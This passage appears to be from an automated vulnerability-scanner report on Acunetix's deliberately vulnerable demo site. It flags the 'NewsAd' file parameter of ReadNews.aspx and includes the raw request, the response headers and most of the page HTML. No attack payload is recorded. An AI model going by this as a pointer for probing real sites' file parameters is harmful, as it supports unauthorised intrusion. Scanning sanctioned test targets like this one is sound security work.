style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2
Method	GET
Parameter	NewsAd
Attack
Evidence
Show / hide Request and Response
Request Header - size: 350 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 30606
Response Body - size: 30,606 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZCqQXr9Bo+fii5vVAAhGyfGRVNk1" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLjj6S6DAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBJXwOObHp1dq30nemUavTDCszjxx" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" 